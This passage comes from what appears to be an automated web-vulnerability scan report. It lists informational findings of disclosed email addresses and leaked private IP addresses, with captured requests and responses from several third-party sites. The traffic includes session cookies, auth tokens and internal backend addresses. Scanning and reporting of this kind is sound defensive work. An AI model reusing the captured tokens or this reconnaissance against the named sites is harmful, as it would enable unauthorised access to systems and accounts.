GET /LoginPage.aspx HTTP/1.1
Host: www.ripoffreport.com
Proxy-Connection: keep-alive
Referer: http://www.ripoffreport.com/ConsumerResources.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=38277280.1303747675.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=38277280.797691246.1303747675.1303747675.1303747675.1; __utmc=38277280; __utmb=38277280.2.10.1303747675

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 16:25:18 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXAUTH=204DAD60EB1BBD88C59E5F5F9173063C696A0F7001F3DAB68B91E49725FD98FA9004A1B768AD6C5CCF6FC284A723C82A4AE351B51D920A7472D17715227F8C8F5EA7067B1EC089AE4B0F0AD2D9D779F79D62DB169E8EB4A2EDB1833E9FBFB093E1F7AA47EC45274B2DB2BA709F7D2D261236D9197EEE8A4CF97B216F06C285E994CAAB0AF14BE9CF81CF25F5779A8377F57F2E3A93FF28013B612CC450AC879DDF0FFF87E5F1BFA2EA945555182C4ADA; expires=Wed, 25-May-2011 16:13:07 GMT; path=/; HttpOnly
P3P: CP="NON DSP COR ADM DEV HIS OTPi OUR IND STA"
ROR-NODE: 09
Content-Length: 18684


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"
...[SNIP]...
<a href="mailto:EDitor@ripoffreport.com">
...[SNIP]...
27.65. http://www.smpone.com/Static-contact.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /Static-contact.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /Static-contact.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/Sections-read-126.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.10.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733897

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733901; expires=Mon, 25-Apr-2011 12:28:21 GMT; path=/
Content-Type: text/html
Content-Length: 14568

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners Information Security Consultants - Contact Inf
...[SNIP]...
<a href="mailto:sales@smpone.com">
...[SNIP]...
<a href="mailto:hr@smpone.com?">
...[SNIP]...
27.66. http://www.smpone.com/javascript/common.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /javascript/common.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /javascript/common.php HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/?gclid=CLbB86LPt6gCFSIRNAod2E3lCQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.1.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733867

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:17:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 5596

/*************************************************
   . Copyright 2006 - 2009 Tres Media Group, Inc.
   The code contained within cannot be reproduced
   or modified without the expressed permission of:
   Tres Media Group, Inc. 5105 Hwy 33 Farmingdale,
   NJ 07727 USA 732-751-0253
   erik@tresware.com or dave@tresware.com
*************************************************/

/*************************************************
   This file last updated: 11/19/2008 4:00:08 PM
****************************************
...[SNIP]...
27.67. http://www.stillsecure.com/m/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stillsecure.com
Path:   /m/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /m/?c=contact-us HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/company/testimonials.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.8.10.1303732858

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:24 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17059

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
<a href="mailto:sales@stillsecure.com">sales@stillsecure.com</a>
...[SNIP]...
<a href="mailto:support@stillsecure.com">support@stillsecure.com</a>
...[SNIP]...
<a href="mailto:bherman@stillsecure.com">bherman@stillsecure.com</a>
...[SNIP]...
<a href="mailto:soc@stillsecure.com">soc@stillsecure.com</a>
...[SNIP]...
27.68. http://www.supportskins.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supportskins.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
Host: www.supportskins.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWIFT_sessionid80=jkh1u654s174y67mflyld69pqqrqm6bq; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; __utmz=127474959.1303758906.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=127474959.1607895902.1303758906.1303758906.1303758906.1; __utmc=127474959; __utmb=127474959.1.10.1303758906

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 25 Apr 2011 19:44:59 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 827
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...
<p>Please contact the server administrator,
webmaster@supportskins.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...
27.69. http://www.tresware.com/javascript/bbcode.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tresware.com
Path:   /javascript/bbcode.php

Issue detail

The following email address was disclosed in the response:

Request

GET /javascript/bbcode.php HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733900

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 2394

function x() {
   return;
}

var thisForm;

function mozWrap(txtarea, lft, rgt, pmt, pmr) {
   var selLength = txtarea.textLength;
   var selStart = txtarea.selectionStart;
   var selEnd = txtarea.se
...[SNIP]...
my_link + "]";
       rgt="[/url]";
       wrapSelection(txtarea, lft, rgt, "Link Name", "Here");
   }
   return;
}

function wrapSelectionWithEmail(txtarea) {
   var my_link = prompt("Enter Email Address:","you@address.com");
   if (my_link != null) {
       lft="[email=" + my_link + "]";
       rgt="[/email]";
       wrapSelection(txtarea, lft, rgt, "Text", "Email");
   }
   return;
}

function wrapSelectionWithImage(txtarea, lft,
...[SNIP]...
27.70. http://www.tresware.com/javascript/common.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tresware.com
Path:   /javascript/common.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /javascript/common.php HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733900

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 1364

/*************************************************
   . Copyright 2006 - 2008 Tres Media Group, Inc.
   The code contained within cannot be reproduced
   or modified without the expressed permission of:
   Tres Media Group, Inc. 5105 Hwy 33 Farmingdale,
   NJ 07727 USA 732-751-0253
   erik@tresware.com or dave@tresware.com
*************************************************/

/*************************************************
   This file last updated: 5/23/2008 1:21:13 PM
*************************************************/

...[SNIP]...
27.71. http://www.trucklist.ru/cars/&rnd=7005287  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trucklist.ru
Path:   /cars/&rnd=7005287

Issue detail

The following email address was disclosed in the response:

Request

GET /cars/&rnd=7005287 HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30; __utmz=134141457.1303741282.1.1.utmcsr=y_direct|utmccn=truck|utmcmd=cpc; __utma=134141457.1874277008.1303741282.1303741282.1303741282.1; __utmc=134141457; __utmb=134141457.1.10.1303741282

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:53:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:53:26 GMT
Content-Length: 44657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru">
<head>
   <meta htt
...[SNIP]...
<!--Rating@Mail.ru COUNTER-->
...[SNIP]...
27.72. http://www.trucklist.ru/cars/trucks  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trucklist.ru
Path:   /cars/trucks

Issue detail

The following email address was disclosed in the response:

Request

GET /cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:37:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1b167314767bdffd9a5c5c390d79c0cc; path=/; domain=trucklist.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: records_per_page=30; expires=Tue, 24-Apr-2012 14:22:59 GMT; path=/; domain=.trucklist.ru
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:23:12 GMT
Content-Length: 139769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru">
<head>
   <meta htt
...[SNIP]...
<!--Rating@Mail.ru COUNTER-->
...[SNIP]...
27.73. http://www.trucklist.ru/cars/undefined  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trucklist.ru
Path:   /cars/undefined

Issue detail

The following email address was disclosed in the response:

Request

GET /cars/undefined HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30; __utmz=94358872.1303741294.1.1.utmcsr=y_direct|utmccn=truck|utmcmd=cpc; __utma=94358872.676514869.1303741294.1303741294.1303741294.1; __utmc=94358872; __utmb=94358872.1.10.1303741294; subscribe_list_data=%7B%22type%22%3A%22SearchAds%22%2C%22category%22%3A%2245%22%2C%22region%22%3A%226586%22%2C%22filter_currency%22%3A%222715%22%2C%22filter_photo%22%3A%220%22%7D

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:53:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:38:37 GMT
Content-Length: 4387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
<!--Rating@Mail.ru COUNTER-->
...[SNIP]...
27.74. http://www.trucklist.ru/webroot/delivery/js/jquery.cookie.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trucklist.ru
Path:   /webroot/delivery/js/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /webroot/delivery/js/jquery.cookie.js?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:40:54 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 4246
Last-Modified: Thu, 25 Jun 2009 06:27:50 GMT
Connection: keep-alive
Expires: Wed, 25 May 2011 14:40:54 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...
28. Private IP addresses disclosed  previous  next
There are 18 instances of this issue:

28.1. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.eset.com%2Fus%2Fhome%2Fsmart-security%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Mon, 25 Apr 2011 08:19:37 -0700
Pragma:
X-FB-Rev: 370179
X-FB-Server: 10.32.37.111
X-Cnection: close
Date: Mon, 25 Apr 2011 15:17:37 GMT
Content-Length: 290

fb_sharepro_render([{"url":"http:\/\/www.eset.com\/us\/home\/smart-security","normalized_url":"http:\/\/www.eset.com\/us\/home\/smart-security","share_count":122,"like_count":99,"comment_count":62,"to
...[SNIP]...
28.2. http://games.mochiads.com/c/g/moon-volley/mvolley.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://games.mochiads.com
Path:   /c/g/moon-volley/mvolley.swf

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /c/g/moon-volley/mvolley.swf HTTP/1.1
Host: games.mochiads.com
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: application/x-shockwave-flash
Content-Length: 75083
Last-Modified: Fri, 15 Oct 2010 08:34:09 GMT
P3P: policyref="http://www.mochimedia.com/p3p/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Permitted-Cross-Domain-Policies: master-only
User-Header: X-Permitted-Cross-Domain-Policies: master-only
X-MochiAds-Server: 38.102.129.47:80
Accept-Ranges: bytes
X-Mochi-Backend: 10.0.0.105:40049
X-Mochi-Source: 10.0.0.239:3832
Cache-Control: max-age=43200
Expires: Tue, 26 Apr 2011 02:45:26 GMT
Date: Mon, 25 Apr 2011 14:45:26 GMT
Connection: close

CWS
.b..x..}.|TU..9...I.IBo..-^ .T[BHB00.    e..;....d3...........Q.&..DE..." .uu......;..d.........!........3#...MH.c....x.B..o.....r..m;m.....w...h..jo0.y..d.....O[?..N..{r.....+.X.o..7....}v.7..;.~..
...[SNIP]...
28.3. http://games.mochiads.com/c/p/ef/e5e385166a55a8dceb27b50f280ff784da72d7fb.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://games.mochiads.com
Path:   /c/p/ef/e5e385166a55a8dceb27b50f280ff784da72d7fb.swf

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /c/p/ef/e5e385166a55a8dceb27b50f280ff784da72d7fb.swf HTTP/1.1
Host: games.mochiads.com
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/public/flash/r4/ef_the_game.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: application/x-shockwave-flash
Content-Length: 62901
Last-Modified: Tue, 20 Jul 2010 15:00:02 GMT
P3P: policyref="http://www.mochimedia.com/p3p/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Permitted-Cross-Domain-Policies: master-only
User-Header: X-Permitted-Cross-Domain-Policies: master-only
X-MochiAds-Server: 38.102.129.47:80
Accept-Ranges: bytes
X-Mochi-Backend: 10.0.0.107:40049
X-Mochi-Source: 10.0.0.238:2874
Cache-Control: max-age=43200
Expires: Tue, 26 Apr 2011 02:47:29 GMT
Date: Mon, 25 Apr 2011 14:47:29 GMT
Connection: close

CWS    .|..x....\T....v.$j...MP..I..i.....$ *."*"2.tZ.3"H.....&.(.@m......Q.3*&.c._....s..w.y......w>.X.v.U.j....."`...Z..F......q.....X]....9....5=iqb......g.&....d.P@..`..;....-....(....i......@ .....@
...[SNIP]...
28.4. http://games.mochiads.com/c/p/moon-volley/774763507f1fe51de5bc05aa7b5114765e0ae832.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://games.mochiads.com
Path:   /c/p/moon-volley/774763507f1fe51de5bc05aa7b5114765e0ae832.swf

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /c/p/moon-volley/774763507f1fe51de5bc05aa7b5114765e0ae832.swf HTTP/1.1
Host: games.mochiads.com
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: application/x-shockwave-flash
Content-Length: 1428
Last-Modified: Sun, 28 Dec 2008 12:34:04 GMT
P3P: policyref="http://www.mochimedia.com/p3p/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Permitted-Cross-Domain-Policies: master-only
User-Header: X-Permitted-Cross-Domain-Policies: master-only
X-MochiAds-Server: 38.102.129.21:80
Accept-Ranges: bytes
X-Mochi-Backend: 10.0.0.107:40049
X-Mochi-Source: 10.0.0.236:53219
Cache-Control: max-age=43200
Expires: Tue, 26 Apr 2011 02:46:57 GMT
Date: Mon, 25 Apr 2011 14:46:57 GMT
